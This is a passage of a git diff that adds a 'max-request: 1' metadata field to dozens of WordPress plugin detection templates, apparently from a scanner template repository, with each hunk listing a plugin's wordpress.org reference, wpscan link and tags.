a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: 